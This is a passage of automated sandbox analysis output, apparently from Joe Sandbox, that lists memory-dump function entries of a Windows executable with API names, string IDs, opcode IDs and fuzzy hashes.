                                                                                                      • Instruction Fuzzy Hash: A3416331E0865A85EF15FF25F9460BDA7A6EBC4790B994035E94E4BB85EE3CD4438320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                      • Instruction ID: bf32b4c13c947141756587a62978a6ec34105a4de63f9b59c84ea9056130547a
                                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                      • Instruction Fuzzy Hash: 1641C332B19B8981DF209F25F4453A9A761F798794F884131EA4D87788EF3CD402CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID: :
                                                                                                      • API String ID: 1611563598-336475711
                                                                                                      • Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                      • Instruction ID: 3c3ad2fde19808e99697add0861de7030d14a56d05bc08826a7b33b82b00a1ec
                                                                                                      • Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                      • Instruction Fuzzy Hash: 0B21F5A2E0828581EF20AB15E04527DA3B6FBC4B44FCE4039DA8D43784EF7CD5468B60
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                      • Instruction ID: 3733e0cf241d1442c4b96aa053aa9d21f5a6e3c9c23bab3624123f65217acb0d
                                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                      • Instruction Fuzzy Hash: F5112E32618B8982EF659F15F544269B7E4FB88B84F9C4230DB8D07758DF3CD5528B50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                      • String ID: :
                                                                                                      • API String ID: 2595371189-336475711
                                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                      • Instruction ID: 5a063c204d68416190b909686b7ab5c0bcfc730a38d98f06f81431af43c92547
                                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                      • Instruction Fuzzy Hash: 01017162A1860A85FF34BFB4B46227EA3A0EFC4744FD80435D58D82681EE2CD5068F24